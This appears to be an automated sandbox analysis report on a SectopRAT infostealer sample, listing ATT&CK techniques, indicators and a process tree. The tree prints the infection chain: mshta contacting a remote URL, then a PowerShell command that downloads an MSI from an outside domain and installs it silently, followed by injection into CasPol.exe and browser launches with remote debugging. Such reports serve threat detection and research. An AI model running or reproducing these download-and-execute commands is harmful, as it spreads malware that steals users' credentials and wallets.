sectoprat | 224f43d5ef6e058aa2ff03c942adfb0936ecf28394a8d58ffaab724ebbd6d121

pid	Process
4132	chrome.exe
5496	chrome.exe
2552	chrome.exe
2200	msedge.exe
3532	msedge.exe
5012	msedge.exe
2472	chrome.exe
3004	chrome.exe
5472	chrome.exe
5872	msedge.exe
4396	msedge.exe
2532	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 2 IoCs

pid	Process
504	vmnetdhcp.exe
5612	CasPol.exe

Loads dropped DLL 5 IoCs

pid	Process
4512	MsiExec.exe
4512	MsiExec.exe
4512	MsiExec.exe
4512	MsiExec.exe
3200	CasPol.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 504 set thread context of 3200	504	vmnetdhcp.exe	106
PID 504 set thread context of 2968	504	vmnetdhcp.exe	107
PID 3200 set thread context of 5612	3200	CasPol.exe	111

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSIC034.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC093.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC0F1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC1DD.tmp	msiexec.exe
File created	C:\Windows\Installer\e57bd1a.msi	msiexec.exe
File created	C:\Windows\Installer\e57bd16.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57bd16.msi	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{05E46191-7BCB-4049-A621-B435063F3BBD}	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBE9D.tmp	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4884	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vmnetdhcp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gpupdate.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
4884	powershell.exe
4884	powershell.exe
2448	powershell.exe
2448	powershell.exe
2692	msiexec.exe
2692	msiexec.exe
504	vmnetdhcp.exe
504	vmnetdhcp.exe
504	vmnetdhcp.exe
504	vmnetdhcp.exe
3200	CasPol.exe
3200	CasPol.exe
3200	CasPol.exe
3200	CasPol.exe
3200	CasPol.exe
3200	CasPol.exe
2968	gpupdate.exe
2968	gpupdate.exe
2968	gpupdate.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe
5612	CasPol.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
504	vmnetdhcp.exe
504	vmnetdhcp.exe
504	vmnetdhcp.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
5872	msedge.exe
5872	msedge.exe
5872	msedge.exe
5872	msedge.exe
5872	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeShutdownPrivilege	3404	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3404	msiexec.exe
Token: SeSecurityPrivilege	2692	msiexec.exe
Token: SeCreateTokenPrivilege	3404	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3404	msiexec.exe
Token: SeLockMemoryPrivilege	3404	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3404	msiexec.exe
Token: SeMachineAccountPrivilege	3404	msiexec.exe
Token: SeTcbPrivilege	3404	msiexec.exe
Token: SeSecurityPrivilege	3404	msiexec.exe
Token: SeTakeOwnershipPrivilege	3404	msiexec.exe
Token: SeLoadDriverPrivilege	3404	msiexec.exe
Token: SeSystemProfilePrivilege	3404	msiexec.exe
Token: SeSystemtimePrivilege	3404	msiexec.exe
Token: SeProfSingleProcessPrivilege	3404	msiexec.exe
Token: SeIncBasePriorityPrivilege	3404	msiexec.exe
Token: SeCreatePagefilePrivilege	3404	msiexec.exe
Token: SeCreatePermanentPrivilege	3404	msiexec.exe
Token: SeBackupPrivilege	3404	msiexec.exe
Token: SeRestorePrivilege	3404	msiexec.exe
Token: SeShutdownPrivilege	3404	msiexec.exe
Token: SeDebugPrivilege	3404	msiexec.exe
Token: SeAuditPrivilege	3404	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3404	msiexec.exe
Token: SeChangeNotifyPrivilege	3404	msiexec.exe
Token: SeRemoteShutdownPrivilege	3404	msiexec.exe
Token: SeUndockPrivilege	3404	msiexec.exe
Token: SeSyncAgentPrivilege	3404	msiexec.exe
Token: SeEnableDelegationPrivilege	3404	msiexec.exe
Token: SeManageVolumePrivilege	3404	msiexec.exe
Token: SeImpersonatePrivilege	3404	msiexec.exe
Token: SeCreateGlobalPrivilege	3404	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe
Token: SeRestorePrivilege	2692	msiexec.exe
Token: SeTakeOwnershipPrivilege	2692	msiexec.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
2472	chrome.exe
5872	msedge.exe
5872	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5612	CasPol.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4884 wrote to memory of 2820	4884	powershell.exe	87
PID 4884 wrote to memory of 2820	4884	powershell.exe	87
PID 2820 wrote to memory of 2448	2820	mshta.exe	88
PID 2820 wrote to memory of 2448	2820	mshta.exe	88
PID 2448 wrote to memory of 3404	2448	powershell.exe	101
PID 2448 wrote to memory of 3404	2448	powershell.exe	101
PID 2692 wrote to memory of 4512	2692	msiexec.exe	104
PID 2692 wrote to memory of 4512	2692	msiexec.exe	104
PID 2692 wrote to memory of 4512	2692	msiexec.exe	104
PID 2692 wrote to memory of 504	2692	msiexec.exe	105
PID 2692 wrote to memory of 504	2692	msiexec.exe	105
PID 2692 wrote to memory of 504	2692	msiexec.exe	105
PID 504 wrote to memory of 3200	504	vmnetdhcp.exe	106
PID 504 wrote to memory of 3200	504	vmnetdhcp.exe	106
PID 504 wrote to memory of 3200	504	vmnetdhcp.exe	106
PID 504 wrote to memory of 3200	504	vmnetdhcp.exe	106
PID 504 wrote to memory of 3200	504	vmnetdhcp.exe	106
PID 504 wrote to memory of 2968	504	vmnetdhcp.exe	107
PID 504 wrote to memory of 2968	504	vmnetdhcp.exe	107
PID 504 wrote to memory of 2968	504	vmnetdhcp.exe	107
PID 504 wrote to memory of 2968	504	vmnetdhcp.exe	107
PID 3200 wrote to memory of 5612	3200	CasPol.exe	111
PID 3200 wrote to memory of 5612	3200	CasPol.exe	111
PID 3200 wrote to memory of 5612	3200	CasPol.exe	111
PID 3200 wrote to memory of 5612	3200	CasPol.exe	111
PID 3200 wrote to memory of 5612	3200	CasPol.exe	111
PID 3200 wrote to memory of 5612	3200	CasPol.exe	111
PID 3200 wrote to memory of 5612	3200	CasPol.exe	111
PID 3200 wrote to memory of 5612	3200	CasPol.exe	111
PID 5612 wrote to memory of 2472	5612	CasPol.exe	121
PID 5612 wrote to memory of 2472	5612	CasPol.exe	121
PID 2472 wrote to memory of 1544	2472	chrome.exe	122
PID 2472 wrote to memory of 1544	2472	chrome.exe	122
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 5468	2472	chrome.exe	123
PID 2472 wrote to memory of 2036	2472	chrome.exe	124

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\file.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4884
- - C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" https://serviceindustrverif.com
    3⤵
    - Blocklisted process makes network request
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\6bc.msi; msiexec /i C:\Users\Public\6bc.msi /qn"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2448
    - - C:\Windows\system32\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i C:\Users\Public\6bc.msi /qn
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3404
- C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe
  "C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:5612
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9839 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2472
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe2986dcf8,0x7ffe2986dd04,0x7ffe2986dd10
      4⤵
      PID:1544
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2044,i,9206938035165941998,3528218816211813580,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2036 /prefetch:2
      4⤵
      PID:5468
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2264,i,9206938035165941998,3528218816211813580,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2284 /prefetch:3
      4⤵
      PID:2036
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2396,i,9206938035165941998,3528218816211813580,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2572 /prefetch:8
      4⤵
      PID:1720
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9839 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3300,i,9206938035165941998,3528218816211813580,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3312 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3004
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9839 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3340,i,9206938035165941998,3528218816211813580,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3364 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4132
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9839 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,9206938035165941998,3528218816211813580,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4552 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:5472
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9839 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=2424,i,9206938035165941998,3528218816211813580,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4572 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:5496
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9839 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4872,i,9206938035165941998,3528218816211813580,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4856 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2552
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=8378 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:5872
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x264,0x7ffe25adf208,0x7ffe25adf214,0x7ffe25adf220
      4⤵
      PID:5788
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=1968,i,4436319289033291928,4477113529420096447,262144 --variations-seed-version --mojo-platform-channel-handle=2300 /prefetch:3
      4⤵
      PID:3696
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --subproc-heap-profiling --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2272,i,4436319289033291928,4477113529420096447,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:2
      4⤵
      PID:6108
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=2576,i,4436319289033291928,4477113529420096447,262144 --variations-seed-version --mojo-platform-channel-handle=2732 /prefetch:8
      4⤵
      PID:2728
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --subproc-heap-profiling --remote-debugging-port=8378 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3532,i,4436319289033291928,4477113529420096447,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3532
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --subproc-heap-profiling --remote-debugging-port=8378 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3540,i,4436319289033291928,4477113529420096447,262144 --variations-seed-version --mojo-platform-channel-handle=3596 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --subproc-heap-profiling --remote-debugging-port=8378 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4208,i,4436319289033291928,4477113529420096447,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2532
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=8378 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4224,i,4436319289033291928,4477113529420096447,262144 --variations-seed-version --mojo-platform-channel-handle=4296 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:4396
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=8378 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5076,i,4436319289033291928,4477113529420096447,262144 --variations-seed-version --mojo-platform-channel-handle=5096 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:5012
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=3800,i,4436319289033291928,4477113529420096447,262144 --variations-seed-version --mojo-platform-channel-handle=5372 /prefetch:8
      4⤵
      PID:5940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=5344,i,4436319289033291928,4477113529420096447,262144 --variations-seed-version --mojo-platform-channel-handle=3848 /prefetch:8
      4⤵
      PID:2092

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D84F84A1D71C00E76797D2BDC508CEE4
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4512
- C:\Users\Admin\AppData\Roaming\Cruse\vmnetdhcp.exe
  "C:\Users\Admin\AppData\Roaming\Cruse\vmnetdhcp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:504
- - C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe
    C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
